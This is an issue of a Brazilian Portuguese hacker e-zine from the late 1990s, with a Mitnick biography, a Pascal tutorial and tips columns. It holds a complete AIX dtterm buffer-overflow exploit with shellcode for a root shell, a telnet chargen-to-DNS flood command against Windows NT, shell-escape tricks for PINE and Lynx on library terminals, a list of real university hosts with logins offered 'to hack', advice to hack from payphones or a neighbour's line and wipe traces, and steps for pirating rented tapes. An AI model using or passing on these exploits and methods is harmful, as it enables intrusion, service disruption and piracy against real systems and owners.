Cszine 13
zZZZZZZZZZZZZZZZz
zZ
cCCCCCCCCc sSSSSSSSSs zZ
cCCCCCCCCCCCCc sSSSSSSSSSSSSs zZ
cCCC CCCCc sSSS SSSSs zZ
cCCCc SSSSs zZ II NNn NN EEEEE
CCCCC SSSSSSSSSSs zZ II NNNn NN EE
CCCCC SSSSSSSSSs zZ II NN NnNN EEEE
CCCCC SSSSS zZ II NN NNN EE
CCCC CCCCc sSSSS SSSS zZ II NN NN EEEEE
CCCCCCCCCCCCCC SSSSSSSSSSSSSS zZ
CCCCCCCCCC SSSSSSSSSS zZ
zZ
zZ
zZZZZZZZZZZZZZZZZz
PS: Se você não conseguiu lêr direito, aí em cima tah escrito CSZine.
UIN da revista : 16623675
Canal da revista : #CSCHANNEL no irc.via-rs.com.br
E-Mails da revista : cszine@hotmail.com
cszine@xoommail.com
Page da revista : http://members.xoom.com/cszine
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=Cheat=Struck-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Introdução
Pelo que me parece os mails diminuiram muito ultimamente. Sera que isso quer dizer que não estão mais lendo a zine??? Se a coisa continuar assim periga a acabar de vez com a zine. Eu mal to conseguindo segura todas as pontas direito, e descubro que poucos estam lendo.
Programadores!!! Gostaria que vcs me mandassem mails com fontes de programas em C para servirem de exemplo quando sair o tutorial(se sair). Tb preciso de alguem que se comprometa a escrever um tutorial de C. Não precisa ser lah essas coisas, apenas uma introdução aos comandos simples que eu complemento depois.
Outra coisa que eu também precisaria que me escrevessem seria a area de Virus e Crackerz. Eu estava pensando em juntar as duas agora que sairá a nova area de Anarchy. Ah Não preciso de mais escritores de anarchy, pois dois kras jah se comprometeram a me enviar o material.
Phreakers também são bem vindos. Mandem projetos de boxes, truques ou informaçıes recolhidas, tipo os procedimentos dos aparelhos telefonicos a cartão. Isso se encontra numa das paginas do manual da embratel. Soh que eu ainda não a consegui.
A seção News talvez saia junto com a Vivendo pelo fato de eu não ter recebido mails com dicas ou novidades.
Outra coisa: A seção Invasão de privacidade que estava prevista para a edição passada não saiu porque quando eu ví, jah tinha acabado ela. Foi mal ,essa jah é a segunda vez q isso acontece. Tomarei mais cuidado no futuro.
Indice
Seção: Materia: Assunto: Autor: Nota:
1. Kevin Mitinck "O chacal da rede" AliBaBa 10,0
2. Phreaking Serviços da Embratel Cheat Struck 9,5
3. Programação Tutorial de pascal p3 Cheat Struck 10,0
4. Vivendo Carpe Diem Cheat Struck 9,5
5. Hacking p/ iniciantes Preparando você Cheat Struck 8,5
6. Bugz Bugz para AIX e WinNT Cheat Struck 10,0
7. Crackerz Lista de hexas Cheat Struck 9,5
8. Invasão de privacidade Entrando em bibliotecas Cheat Struck 10,0
9. Hack, the Art Teste Hacker p2 Cheat Struck 9,5
10. °°°BoNuS!!! Lista de bibliotecas Cheat Struck 9,5
1. Kevin Mitnick
A histria do Chacal da rede. (parte 2)
Em 1991 ja era o Hacker que havia ocupado a primeira paginaa do New York Times e um de seus reporteres, John Markoff, decidiu escrever um livro, de estilo Cyberpunk, narrando as aventuras de Mitnick. Ao que parece, Mitnick não gostou do livro ja que logo que saiu a venda, a conta na Internet de Markoff foi invadida, mudando seu nivel de acesso, de maneira de que qualquer pessona no mundo conectada a Internet poderia ver seu correio eletronico.
Em 1992, após concluir seu programa, Mitnick começou a trabalhar em uma agencia de detetives. Descubriu um meio ilegal do uso da base de dados q foi objeto de uma investigação por parte do FBI que determinou que ele havia violado os terminos da sua liberdade condicional. Alarmaram sua casa mas havia desaparecido sem deixar rastro algum. Agora Mitnick se havia convertido em um Hacker fugitivo.
O fiscal não estava tão equivocado quando pidiu a restrição do uso do telefone. Tambem em 1992, o Departamento de Veiculos de California ofereceu uma recompensa de 1 milhão de dolares a quem prender Mitnick por ter tratado de obter uma licença de dirigir de maneira fraudulenta, utilizando um código de acesso e enviando seus dados via fax.
Depois de converterse em fugitivo mudou de tatica e concluiu que a melhor maneira de não ser rastreado era utilizando telefones celulares. Desta maneira poderia cometer suas façanhas e não estar atado a nenhum lugar fixo. Para ele, necessitava obter programas que lhe permitisem moverse com a mesma facilidade com que o fazia na rede telefonica.
Depois de varias tentativas frustradas quanto a quantitade de informação, se encontrou com o computador de Tsutomu Shimomura o qual invadio na novidade de 1994. Shimomura, fisico computista e expert em sistemas de segurança de San Diego Supercomputer Center, era mais um Hacker muito bom, mas era dos "meninos bonzinhos", ja que quando achava uma falha de segurança em algum sistema, o reportava as autoridades e não a outros Hackers.
Shimomura notou que alguem havia invadido seu computador na sua ausencia, utilizando um metodo de intrusão muito sofisticado e que ele nunca antes havia visto. O intruso lhe havia roubado seu correio eletronico, software para controle de telefones celulares e varias ferramentas de segurança na Internet. Alí começou a contagem regressiva para Mitnick. Shimomura se propôs como orgulho pessoal pegar o Hacker que havia invadido sua privacidade
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-==-=-=-=-=-=-=-
Fim da parte 2
-=-=-=-=-=-=-=-=-=--=-=-=-==-=-=-==-=-=-=-=-=-=-=-=-==-==-=-=-=-=-=-=-=-=-=-=
2. Phreaking
Serviços Nacionais da Embratel:
Para prestar o Serviço Telefônico em âmbito nacional, a EMBRATEL utiliza diversas centrais telefônicas digitais, denominadas Centrais de Trânsito, interligadas entre si, através de fibras óticas ou meios de transmissão digitais.
A seguir, estão destacados os principais tipos de chamadas telefônicas que podem trafegar por essa Rede:
***** CHAMADAS INTERURBANAS MANUAIS ou SEMI-AUTOM¡TICAS *****
são aquelas completadas com o auxílio da telefonista interurbana;
***** CHAMADAS DDD *****
são ligaçıes telefônicas completadas, automaticamente, sem o auxílio de telefonista;
***** CHAMADAS INTERURBANAS A COBRAR - DDC/DIC *****
são chamadas em que o assinante de destino se torna, voluntariamente, o responsável pelo pagamento da ligação telefônica;
***** CHAMADAS LOCAIS A COBRAR *****
idênticas ‡s chamadas anteriormente descritas, porém efetuadas dentro da mesma localidade;
***** CHAMADAS PARA O SERVI«O 0800 *****
são chamadas para as quais o assinante de destino, previamente, é o responsável pelo pagamento do tráfego a ele destinado.
***** CHAMADAS PARA O SERVI«O 0900 *****
são chamadas destinadas aos serviços de entretenimento, pesquisas de opinião, sorteios, doaçıes, vendas de produtos e serviços, para as quais o usuário não paga a chamada, cabendo apenas o pagamento do valor determinado pelo provedor do serviço em questão.
***** CHAMADAS PARA SERVI«OS DE REDE INTELIGENTE *****
são chamadas destinadas, a serviços bancários, de cartıes de crédito, vendas, transportes e etc, pagas pelo assinante de destino, que incorporam diversas facilidades técnicas, para o provedor do serviço, tais como número único (o mesmo número é discado de qualquer ponto do território nacional sem o uso do Código DDD), atendimento em pontos diferenciados conforme dias e horários previamente acordados, possibilidade de integração de outros serviços.
-=-=-=-=-=-=-=-=-=-==-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-==-=-=-=-=-
Fonte: www.embratel.net.br - internet
0800 102 102 - Telefone a voz
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
3. Programação
Aviso!!!
Atenção programadores. Estou precisando de alguem para escrever tutoriais de C para a zine. Eu ateh faria mas estou trabalhando em outros ramos.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-==-
Tutorial de Pascal (parte 3)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=
ªªªªªªªªªª Comando IF, Then e Else ´´´´´´´´´´
Sintaxe:
If <expresão> then <comando1>
else <comando2>;
Se a expresão for verdadeira executa o comando1, se for falsa executa o comando2.
Caso ter que executar mais de um comando use:
If <expressão> then Begin
<comando1>;
<comando2>;
<comando3>;
...
End
Else Begin
<comando4>;
<comando5>;
...
End;
Note que o ;(ponto e virgula) só aparece no ultimo End ou depis dos comandos.
ªªªªªªªªªª Labels e GOTO ´´´´´´´´´´
Exemplo:
label INICIO;
Begin
INICIO:
ClrScr;
Write ('Olha qts linhas dessas vão aparecer');
Goto INICIO;
End.
ªªªªªªªªªª Repeat e Until ´´´´´´´´´´
Sintaxe:
Repeat
<comando1>;
<comando2>;
...
Until <expressão>
O programa executará os comandos 1 e 2 até que a expressão do Until seja verdadeira. Caso isso nunca aconteça, o programa ficará preso num loop infinito.
ªªªªªªªªªª While e Do ´´´´´´´´´´
Sintaxe:
While <expressão> Do Begin
<comando1>;
<comando2>;
...
End;
Funciona como o Repeat porém quando a expressão for verdadeira o programa para de executar os comandos e emquanto for falsa ele continuará executando-os.
ªªªªªªªªªª Case ´´´´´´´´´´
Sintaxe:
Case <variavel> of
<valor1> : <Comando1>;
<valor2> : <Comando2>;
Else <Comando3>;
End;
Se a varialvel tiver como valor o valor1, o comando1 será executado, se tiver como valor o valor2 será executado o comando2... E se não for nenhum deles executará o comando3.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Fim da parte 3
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
4. Vivendo
Abrindo portas mal trancadas
Jah tive que passar por isso, uma vez em q eu esqueci a chave de casa e não tinha como entrar.
Deixe eu explicar a situação: A porta deve ser daquelas que a maçaneta só gira pelo lado de dentro, imposibilitando com q a possoa do lado de fora abra a porta, a não ser q tenha uma chave.
Faça o seguinte..
Desparafuse a maçaneta e a placa de metal q a contorna.
Note que as maçanetas são ligadas por tipo um parafuso de 2 cabecas. Use uma chave de fendas e gire este "parafuso" para o lado o qual a maçaneta é virada para abrir a porta.
Pimba! The door is opened!
-=-=-=-=-=-=-=-=-=-=-=-=-=-
Grave seus jogos de videogame
… trizinho as vezes gravar akela abertura (tipo a do resident evil 2) do seu joginho de videogame. Ou as vezes até o jogo é trisinho ver como voce humilhou akele seu amigo no tekken.
Faça o seguinte..
Ligue a tv ao videogame e ao video ksete assim:
__________
| | __________ __________
| | | | | ___ |
| TV |========|out in|=======| /===\ |
| | |__________| | \___/ |
|__________| video |__________|
videogame
Se precisar de um adaptador, ligue o cabo que sai do video para o videogame no local do adaptador onde é para colocar o cabo da TV. Assim:
__________
| | __________ _____
| | | | | |
| TV |=========|out in|=======|tv | } adaptador
| | |__________| | |
|__________| video |_____|
||
||
____||____
| ___ |
| /===\ |
| \___/ |
|__________|
videogame
-=-=-=-=-=-=-=-=-=-
Escrevendo na calculadora
Pegue a calculadora e digite:
603 - 50738
Não aperte = Apresadinho. Vire a calculadora e leia. Agora tecle = , ainda com a calculadora virada, e veja o resultado. Resumo: "belos seios".
Mostre para as garotas. Hevvy fun!
-=-=-=-=-=-=-=-=-=-=-=-=-
Pirateando fitas de video Kct.
Você pode ganhar uma bela duma grana.
Para isso vc precisa de 2 videos. Ligue-os assim:
__________
| | __________ __________
| | | | | |
| TV |========|out in|========|out in|
| | |__________| |__________|
|__________| video1 video2
Agora coloque akela fita de video que vc alugou, no video1 e uma outra, onde sera' gravado o filme, no video2.
Dê um PLAY no vide1 e um REC no video2.
Depois que o filme acabar, de uma olhada na fita gravada. Agora entrege a fita, na maior cara de pau, para a locadora e fature em cima da q vc gravou.
Daki a pouco o TITANIC estará nas locadoras, imagine qtas colegas suas não iriam querer comprar a fita do L. de Caprio.
-=-=-=-=-=-=-=-=-=
Sekar os tenis rapidinho.
Essa fórmula eu acho q foi a minha velha q inventou.
Pegua os seus tenis molhadoes dakela pelada de sabado e coloque-os atras da geladeira. Nakeles feros termicos.
Akeles baguiu são responsaveis para deixar a geladeira resfriando de tempo em tempo. Em quanto elas estaum resfriando, akeles tróço ficam quentes. Aí é só chega no outro dia de manhã e bota os tenis quentinhos.
Se quizer q sequem rapidinho poe no freezer ou se sua geladeira for dakelas modernas, deixa a porta dela aberta. Vc tb pode experimentar coloca -los no microondas e ligar em 4 ou 5 minutos(talvez), mas depois quero vê tu comê akela pipoquinha q caiu fora do saco.
-=-=-=-=-=-=-=-=-=-=-=
5. Hacking p/ iniciantes
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Preparando vc para o mundo hacker
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Em primeiro lugar. A pergunta quetod mundo se faz um dia: O que eu tenho que saber para ser um hacker??
Muitas pessoas dizem que apenas conhecendo o protocolo TCP/IP ou o protocolo que a sua rede pessoal usa vc jah sabe o bastante. Não deixa de ser verdade, mas para vc ser reconhecido como um hacker vc precisa saber muito mais.
Tenha um dominio total e absoluto de informatica. Se vc comprou um computador a 6 meses e jah acha que é o maior genio, pode parar de sonhar cabeça de melão. Eu recomendo vc fazer um dakeles cursos completos, desde introdução a hardware.
Após ter adquirido essa cultura, se especialize em um desses locais:
------- Sistemas operacionais UNIX -------
90% dos computadores que acessam a internet usam sistemas da familia UNIX, passando por AIX, IRIX, HP/UX.
------- Conhecimentos de programação -------
De preferencia C, é a linguagem mais extendida. tb existem outra linguagens como Assembly e perl q é interesante conhecer.
------- Conhecimentos de redes -------
A melhor forma de hackear é atravez de redes.
------- Conhecimentos de telefonia -------
A melhor forma de se conectar a redes é atravez de um modem e uma linha telefonica. Por isso é bom vc entender.
------- Protocolos -------
Também deve conhecer 100% todos os protocolos da rede que vc hackear.
Você também precisa ter bons programas apenas por comodismo.
------- Um dialer -------
Para estabelecer conexıes com a rede. No Windows o melhor é o Trumpet e no linux o minicom.
------- Um programa de telnet -------
O melhor ateh agora pra mim é o telnet do linux.
------- Um programa de ftp -------
O ftp do linux serve. O windows tentou imitar mas não tem tantas funçıes quanto o do linux.
------- Um browser -------
Navegador da web. Netscape e Lynx saum bons. Dispense o Internet Explorer caso esteja de Windows.
------- Um scaneador de portas -------
Existem programas tipo portscan da 7th Sphere para Windows. Para Linux a fonte está na minha page.
------- Um crackeador -------
Para senhas de Unix e tb é bom um para Novel. ”timos são o John e o Jack. Ambos para Linux. Talvez algumas versıes para windows/dos.
------- Ferramentas de diagnostico de redes -------
Tipo um sniffer, um medidor de trafico, um capturador de pacotes..
------- Um programa para acabar com rastros -------
Você pode fazer um script legalzinho que faça isso.
Não faça tb coisas ilegais de sua casa. Os melhores lugares para se conectar a rede q vc vai hackear são:
------- Computadores de universidades.
------- Cabines telefonicas.
------- Casa de um 'amigo', mas q este não saiba oq vc esta fazendo.
------- Usando uma extenção de linha de seu visinho.
Pra mim, o melhor lugar é os orelhoes, mas pra isso é exencial ter um laptop, ou vc quer montar o computador alí na cabine?
Acho q por hoje chega. O conteudo pode tar começando a ficar meio ruim mas é que eu não so muito dessas coisas sabe. Se alguem quizer editar essa seção mail-me.
6. Bugz
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Bug para AIX
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
… um exploit para conseguir a shell do root.
Compile-o assim: cc -g aixdtterm.c
--------------------------Corte Aki------------------------------------------
/* Para obtener un shell de root, testeado en Aix 4.2 con RS/6000*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char prog[100]="/usr/dt/bin/dtterm";
char prog2[30]="dtterm";
extern int execv();
char *createvar(char *name,char *value)
{
char *c;
int l;
l=strlen(name)+strlen(value)+4;
if (! (c=malloc(l))) {perror("error allocating");exit(2);};
strcpy(c,name);
strcat(c,"=");
strcat(c,value);
putenv(c);
return c;
}
/*El programa*/
main(int argc,char **argv,char **env)
{
/*El codigo*/
unsigned int code[]={
0x7c0802a6 , 0x9421fbb0 , 0x90010458 , 0x3c60f019 ,
0x60632c48 , 0x90610440 , 0x3c60d002 , 0x60634c0c ,
0x90610444 , 0x3c602f62 , 0x6063696e , 0x90610438 ,
0x3c602f73 , 0x60636801 , 0x3863ffff , 0x9061043c ,
0x30610438 , 0x7c842278 , 0x80410440 , 0x80010444 ,
0x7c0903a6 , 0x4e800420, 0x0
};
/* El desensamblado
7c0802a6 mfspr r0,LR
9421fbb0 stu SP,-1104(SP) --get stack
90010458 st r0,1112(SP)
3c60f019 cau r3,r0,0xf019 --CTR
60632c48 lis r3,r3,11336 --CTR
90610440 st r3,1088(SP)
3c60d002 cau r3,r0,0xd002 --TOC
60634c0c lis r3,r3,19468 --TOC
90610444 st r3,1092(SP)
3c602f62 cau r3,r0,0x2f62 --'/bin/sh\x01'
6063696e lis r3,r3,26990
90610438 st r3,1080(SP)
3c602f73 cau r3,r0,0x2f73
60636801 lis r3,r3,26625
3863ffff addi r3,r3,-1
9061043c st r3,1084(SP) --terminate with 0
30610438 lis r3,SP,1080
7c842278 xor r4,r4,r4 --argv=NULL
80410440 lwz RTOC,1088(SP)
80010444 lwz r0,1092(SP) --jump
7c0903a6 mtspr CTR,r0
4e800420 bctr --jump
*/
#define MAXBUF 600
unsigned int buf[MAXBUF];
unsigned int frame[MAXBUF];
unsigned int i,nop,mn;
int max;
int QUIET=0;
int dobuf=0;
unsigned int toc;
unsigned int eco;
unsigned int *pt;
char *t;
int ch;
unsigned int reta; /* direccion de retorno */
int corr=1000;
char *args[4];
char *arg1="-ms";
char *newenv[8];
int startwith=0;
mn=200;
max=300;
if (argc>1)
corr = atoi(argv[1]);
pt=(unsigned *) &execv;
toc=*(pt+1);
eco=*pt;
if ( ((mn+strlen((char*)&code)/4)>max) || (max>MAXBUF) )
{
perror("Bad parameters");
exit(1);
}
#define OO 7
*((unsigned short *)code + OO + 2)=(unsigned short) (toc & 0x0000ffff);
*((unsigned short *)code + OO)=(unsigned short) ((toc >> 16) & 0x0000ffff);
*((unsigned short *)code + OO + 8 )=(unsigned short) (eco & 0x0000ffff);
*((unsigned short *)code + OO + 6 )=(unsigned short) ((eco >> 16) &
0x0000ffff);
reta=startwith ? (unsigned) &buf[mn]+corr : (unsigned)&buf[0]+corr;
for(nop=0;nop<mn;nop++)
buf[nop]=startwith ? reta : 0x4ffffb82; /*NOP*/
strcpy((char*)&buf[nop],(char*)&code);
i=nop+strlen( (char*) &code)/4-1;
if( !(reta & 0xff) || !(reta && 0xff00) || !(reta && 0xff0000)
|| !(reta && 0xff000000))
{
perror("Return address has zero");exit(5);
}
while(i++<max)
buf[i]=reta;
buf[i]=0;
for(i=0;i<max-1;i++)
frame[i]=reta;
frame[i]=0;
if(QUIET) {puts((char*)&buf);fflush(stdout);exit(0);};
/* 4 vars debido a que la correcta debe alinearse con un limite de 4 bytes */
newenv[0]=createvar("EGGSHEL",(char*)&buf[0]);
newenv[1]=createvar("EGGSHE2",(char*)&buf[0]);
newenv[2]=createvar("EGGSHE3",(char*)&buf[0]);
newenv[3]=createvar("EGGSHE4",(char*)&buf[0]);
newenv[4]=createvar("DISPLAY",getenv("DISPLAY"));
newenv[5]=NULL;
args[0]=prog2;
args[1]=arg1;
args[2]=(char*)&frame[0]; /* Se establecen unos frame pointers */
puts("Start...");/*Vamos!*/
execve(prog,args,newenv);
perror("Error executing execve \n");
-----------------------------------------------------------------------------
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-
Bug no Windows NT
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-=-=-=-==-=-=-=-=-==-=
Violando o DNS do WinNT é barbadinha. Vc nem precisa de exploit nem nada. Apenas faça o seguinte:
telnet host.com.br 19 | telnet host.com.br 53
Isso efetua uma conexão pela porta 19 q gera uma cadeia de caracteres , aí a conexão é redirecionada para a porta 53(DNS). Isso gera um flood de acesso ao serviço DNS e assim imposibilita a conversão de host/ip.
7. Crackerz
Lista de hexas compilada por Cheat Struck (parte 2)
Hexa: Comando:
30C0 XOR AL, AL
30C1 XOR CL, AL
30C2 XOR DL, AL
30C3 XOR BL, AL
30C4 XOR AH, AL
30C5 XOR CH, AL
30C6 XOR DH, AL
30C7 XOR BH, AL
30C8 XOR AL, CL
30C9 XOR CL, CL
30CA XOR DL, CL
30CB XOR BL, CL
30CC XOR AH, CL
30CD XOR CH, CL
30CE XOR DH, CL
30CF XOR BH, CL
30D0 XOR AL, DL
30D1 XOR CL, DL
30D2 XOR DL, DL
30D3 XOR BL, DL
30D4 XOR AH, DL
30D5 XOR CH, DL
30D6 XOR DH, DL
30D7 XOR BH, DL
30D8 XOR AL, BL
30D9 XOR CL, BL
30DA XOR DL, BL
30DB XOR BL, BL
30DC XOR AH, BL
30DD XOR CH, BL
30DE XOR DH, BL
30DF XOR BH, BL
30E0 XOR AL, AH
30E1 XOR CL, AH
30E2 XOR DL, AH
30E3 XOR BL, AH
30E4 XOR AH, AH
30E5 XOR CH, AH
30E6 XOR DH, AH
30E7 XOR BH, AH
30E8 XOR AL, CH
30E9 XOR CL, CH
30EA XOR DL, CH
30EB XOR BL, CH
30EC XOR AH, CH
30ED XOR CH, CH
30EE XOR DH, CH
30EF XOR BH, CH
30F0 XOR AL, DH
30F1 XOR CL, DH
30F2 XOR DL, DH
30F3 XOR BL, DH
30F4 XOR AH, DH
30F5 XOR CH, DH
30F6 XOR DH, DH
30F7 XOR BH, DH
30F8 XOR AL, BH
30F9 XOR CL, BH
30FA XOR DL, BH
30FB XOR BL, BH
30FC XOR AH, BH
30FD XOR CH, BH
30FE XOR DH, BH
30FF XOR BH, BH
31C0 XOR AX, AX
31C1 XOR CX, AX
31C2 XOR DX, AX
31C3 XOR BX, AX
31C8 XOR AX, CX
31C9 XOR CX, CX
31CA XOR DX, CX
31CB XOR BX, CX
31D0 XOR AX, DX
31D1 XOR CX, DX
31D2 XOR DX, DX
31D3 XOR BX, DX
31D8 XOR AX, BX
31D9 XOR CX, BX
31DA XOR DX, BX
31DB XOR BX, BX
34** XOR AL, **
35$$** XOR AX, **$$
80F1** XOR CL, **
80F2** XOR DL, **
80F3** XOR BL, **
80F4** XOR AH, **
80F5** XOR CH, **
80F6** XOR DH, **
80F7** XOR BH, **
81F1$$** XOR CX, **$$
81F2$$** XOR DX, **$$
81F3$$** XOR BX, **$$
26 ES:
2E CS:
36 SS:
3E DS:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Fim da lista de hexas (parte 2)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
8. Invasão de privacidade
Entrando em Bibliotecas Telnet
Faiz tempo que eu to prevendo isso neh? Soh agora que saiu por puro esquecimento nas outras ediçıes. Eu estava empolgado para lançar logo q quando eu ví jah tinha acabado-as.
Atenção!! A fonte dos dados aki contidos é a zine RWX.
Aki estão todas as técnicas:
[ Ctrl + C ]
- Acesse uma biblioteca telnet(url's no °°°BoNuS!!!)
- Os logins de bibliotecas sempre são guest, new ou especificadas pelo serv.
- Dentro da biblioteca tecle Ctrl + C. Em algumas funcionaram em outras não.
[ PINE ]
- Edite o .pinerc
- Acresente essa linha no final do arquivo: feature-list=enable-alternate-editor-cmd, enable-unix-pipe-cmd
- Procure pela linha 'editor=' e mude-a para: editor=sh
- Agora mande um mail de ninguem para ninguem.
- Por fim abra o sh e pimba! O PINE está liberado.
[ JPICO ]
- Apenas mexa um pouco nesse editor e logo q aparecer o menu shell acesse-o.
[ LYNX 1 ]
… pouco provavel que o server libere o lynx para qquer usuário de sua biblioteca. Porém ainda existem gentes que os libera.
- Abra o lynx
- Tecle G de Go
- No url coloque algo tipo: LYNXDOWNLOAD://Method=-1/File=/dev/null;/bin/sh;/SugFile=/dev/null
- Aí quando pedir o file coloque /dev/null
- Quando pedir y/n no overwrite tecle Y
- Se der tudo certo vc cairá na shell.
[LYNX 2]
Isso funciona desde que o server libere o lynx por menu quanto pelo login/senha(lynx/lynx).
- Jah dentro do lynx tecle O de Options
- Abra a opção E de Editor. Nela vc teria q colocar um editor qquer.
- Coloque alí o editor seguido de um file, sempre seguido de exec. Tipo: pico /etc/passwd exec
- Agora salve as modificaçıes com >.
- Tecle G de Goto e coloque no url: file://localhost/bin/sh
- Aparecerá muito lixo e depois vc cairá na shell.
- Mude o terminal para: TERM=vt100 export TERM
Quer que eu explique? Assim:
O Lynx tenta abrir o arquivo colocado com o pico em hexadecimal. Isso causa akele monte de lixo antes da shell.
Depois de abri-lo ele executará o exec no /bin/sh.
Aí vc tá na shell.
9. Hack, the Art
Teste Hacker (parte 2)
21. Você já crackeou alguma coisa?
a) não
b) um arquivo .zip
c) um arquivo de senhas
22. O que vc jah fez numa rede??
a) Conversar, acessar sites..
b) Acessar serviços html, smtp, telnet, ftp, finger, pop, finger, netstat,..
c) Além de acessar serviços, scanear portas, Converter IP para hostname.
23. Vc jah conseguiu serials numbers??
a) Não
b) Só da parte de outras pessoas
c) Eu mesmo tirei os seriais dos progs.
24. Jah derubou um computador??
a) Não
b) por flood ou nuke
c) Dei shutdown/restart computer
25. Jah acessou outro computador?
a) só indo a casa do outro cara
b) sim, um sistema Windows
c) sim, um sistema UNIX
26. O que jah fez com um celular?
a) discar para alguem
b) programar o TESTMODE (Não os telefones na memoria)
c) programar o NAM
27. Jah discou de graça de algum orelhão??
a) não
b) sim, fazendo o truquezinho da tecla 9 ou 0 em orelhıes a cartão
c) sim, fazendo o truque do diodo
28. Jah fez uma box
a) não
b) sim, uma que funciona aki no Brasil tipo a Blackbox
c) sim, lah nos STATES.
29. Jah leu um zine de hacking?
a) Só este.
b) sim, mas só daqui do brasil
c) sim, de ouros paises tb
30. Vc jah foi preso?
a) não, pq nunca fiz nada para ir preso
b) sim
c) não e jah cometi varios atos de natureza criminosa
31. Jah tirou uma hpage do ar??
a) não
b) sim, usando a engenharia social
c) sim, hackeando o servidor
32. Jah tomou um canal de ChanServ??
a) não
b) sim, mudando meu ident
c) sim, hackeando o servidor
33. Jah adquiriu senhas de provedores??
a) não
b) sim, atravéz de outras pessoas
c) sim, hackeando o provedor
34. Jah lêu tutoriais de criação de virus??
a) não
b) Sim, de virus de macro
c) Sim
35. Jah participou de algum grupo hacker??
a) não/ não me deixaram entrar
b) sim
c) não preciso de um grupo
36. Que sistema operacional vc usou para hackear seu 1o servidor??
a) nunca hackiei
b) Windows/DOS
c) um UNIX
37. Você jah hackeou uma universidade, ou algo assim??
a) não
b) sim, mas só pra ver
c) sim, e alterei as minhas notas e de meus amigos.
38. Qual desses progs vc jah usou??
a) nenhum
b) telnet e ftp
c) telnet, ftp, rlogin, scaneador de portas, crackeador, wordlist,..
39. Q ajuda vc precisou para saber o q sabe hoje?
a) Um curso e um kra q me explicava tudo
b) Um curso
c) nenhuma, apenas lendo zines e tutoriais.
40. Vc jah inventou algum meio de invasão??
a) não
b) não, mas aprimorei outros
c) sim
Pontuação:
Cada alternativa que vc marcou A some 1 ponto ao seu score total
Cada alternativa que vc marcou B some 2 pontos ao seu score total
Cada alternativa que vc marcou C some 3 pontos ao seu score total
Resultado das 2 partes:
40 a 50 pontos - Newbie ou Beginer
51 a 80 pontos - Wannabe
81 a 100 pontos - Hacker iniciante
101 a 120 pontos - Hacker ou Cracker
-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-==-=-=-=-=-=
Fim da parte 2
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
10. °°°BoNuS!!!
Lista de Bibliotecas Telnet
Tudo isso só para vc hackear:
* PUC - Pontifícia Universidade Católica - Porto Alegre, RS
aleph.pucrs.br
username : guest
* UFRGS - Universidade Federal do Rio Grande do Sul
asterix.ufrgs.br
username : sabibib
password : bib1993 (se for requerido)
* USP/CCE - Universidade de São Paulo. Centro de Computação Eletrônica
bee08.uspnet.usp.br
username : dedalus
* BIREME - Biblioteca de Resenha Medica - São Paulo, SP
brmc.bireme.br
username : bireme
* UNICAMP/CC - Universidade de Campinas. Centro de Computação - Campinas, SP
ccibm.unicamp.br
ccvax.unicamp.br
username : infocamp
* LNCC - Laboratório Nacional de Computação Cientifica - Rio de Janeiro, RJ
cnen.lncc.br
username : cin
* USP/IF - Universidade de São Paulo. Instituto de Fisica - São Paulo, SP
gopher.if.usp.br (*)
username : gopher
* RNP - Rede Nacional de Pesquisa - Rio de Janeiro, RJ
gopher.rnp.br (*)
username : gopher
TERM : vt100
* UFSM - Universidade Federal de Santa Maria. Santa Maria, RS
gopher.ufsm.br
username : gopher
* CNPq - Conselho Nacional de Desenvolvimento Cientifico e Tecnológico
rnpdf2.cnpq.br
username : info
TERM : vt100
* RNP - Rede Nacional de Pesquisa - São Paulo, SP
www.cr-sp.rnp.br
username : www
* USP/IF - Universidade de São Paulo. Instituto de Fisica - São Paulo, SP
www.if.usp.br
username : www
$$$$$$$$$
Atenção!!!
Eu preciso saber se estão lendo a minha zine.
Por tanto, vc que acabou de le-la mail-me para eu saber.
Naum precisa colocar nada d+ no mail, apenas "lí". Mas eu tb gostaria
que comentassem ela. Se for muito para vc apenas mande o mail assim:
To: cszine@hotmail.com
Cc: ??????
Subject: CSZINE
------Msg------
Lí, NOTA
Tankz!!!
Espero que a zine esteja saindo rapido o bastante para vc.